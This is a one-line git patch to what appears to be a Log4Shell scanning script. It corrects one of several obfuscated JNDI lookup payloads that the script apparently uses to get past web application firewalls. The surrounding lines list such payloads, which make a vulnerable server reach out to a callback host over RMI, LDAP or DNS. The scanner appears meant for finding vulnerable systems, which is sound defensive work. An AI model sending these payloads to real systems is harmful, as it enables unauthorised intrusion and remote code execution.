From 9ab7a921836db390a702e89f33465b2d859359e6 Mon Sep 17 00:00:00 2001
From: Mayank Deshmukh <coldfusionx@outlook.com>
Date: Mon, 27 Dec 2021 17:12:06 +0530
Subject: [PATCH] Correct WAF bypass rmi payload

---
 log4j-scan.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/log4j-scan.py b/log4j-scan.py
index a968253..e4985e6 100755
--- a/log4j-scan.py
+++ b/log4j-scan.py
@@ -57,7 +57,7 @@
                        "${${lower:jndi}:${lower:rmi}://{{callback_host}}/{{random}}}",
                        "${${lower:${lower:jndi}}:${lower:rmi}://{{callback_host}}/{{random}}}",
                        "${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://{{callback_host}}/{{random}}}",
-                       "${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://{{callback_host}}/{{random}}}",
+                       "${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://{{callback_host}}/{{random}}}",
                        "${jndi:dns://{{callback_host}}/{{random}}}",
                        "${jnd${123%25ff:-${123%25ff:-i:}}ldap://{{callback_host}}/{{random}}}",
                        "${jndi:dns://{{callback_host}}}",